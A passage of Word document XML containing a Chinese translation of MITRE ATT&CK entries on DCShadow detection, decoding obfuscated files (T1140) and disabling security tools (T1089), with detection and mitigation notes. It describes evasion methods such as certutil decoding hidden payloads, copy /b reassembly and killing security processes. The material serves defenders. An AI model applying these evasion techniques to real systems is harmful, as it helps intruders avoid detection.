      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象时发出警报</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C1B26" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调查</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务主体名称（</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的使用情况，特别是那些与</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组织单位（</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OU</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中不存在的计算机相关的服务（以“</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC /</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”开头）。可以在不记录的情况下设置与目录复制服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DRS</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）远程协议接口（</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GUID E3514235-4B06-11D1-AB04-00C04FC2DCD2</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）关联的</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DC</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须使用这两个</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00933429">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为服务进行身份验证，才能成功完成复制过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4A4045" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件或信息解混淆和解码</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2522D1CA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A906B23" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1140</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216AEFEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E82A174" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14789085" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704D0CB0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56ECBBFD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防病毒，主机入侵防御系统，基于签名的检测、网络入侵检测系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F4C315" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Matthew Demaske</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Adaptforward</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Red Canary</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12ECE53B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43D7058E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFCE3E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模糊文件或信息来掩藏其入侵行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，躲避</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析。他们可能需要单独的机制来解码或去除模糊信息，具体取决于他们打算如何使用这些信息。方法包括内置恶意软件、脚本、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ower</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者使用系统上的实用程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF6A5C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中一个例子是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对隐藏在证书文件中的远程访问工具可移植可执行文件进行解码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44601EAB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个例子是使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>copy /b</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令将二进制片段重组为恶意负载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36855865" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>负载可以压缩、存档或加密以避免被发现。在初始访问期间或之后，这些负载可与模糊文件或信息一起使用，以减少检测。有时，可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需要用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来打开文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>才能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>去模糊化或解密。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能还会需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户输入密码来打开</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者提供的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用密码保护的压缩</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者也可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用压缩或归档的脚本，比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>avascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349CDF1A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0127BC12" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66A6EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391EA844" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测文件或信息的去模糊化或解码操作可能很困难，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>具体取决于实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果该功能包含在恶意软件中并使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则在操作之前或之后尝试检测恶意行为可能会产生比尝试分析加载库或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用更好的结果。如果使用了脚本，则可能需要收集脚本进行分析。监控进程和命令行来检测与脚本和系统实用程序（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>certutil</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）相关的潜在恶意行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A19BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控常见存档文件应用程序和扩展程序（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ZIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAR</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存档工具）的执行文件路径和命令行参数，并与其他可疑行为关联，从而减少正常用户和管理员行为的误报。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A23C1" w14:textId="33B1B074" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00E13E84" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全工具</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1F519830" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15AA7084" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1089</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AB43C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3354229A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC04AB5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，文件监控，服务，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，进程命令行参数，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14FED6A7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，主机入侵</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统，基于签名的检测，日志分析，防病毒</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F7D706E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId103" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-578</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4EE26F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18483771" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2583A0E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>如下形式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用安全工具来避免其工具和活动被</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：杀死安全软件或事件日志进程、删除注册表项以使工具运行时不启动，或采用其他方法干扰安全扫描或事件报告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C06FE5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2294"/>
        <w:gridCol w:w="7442"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="7BCF1684" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="029183F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
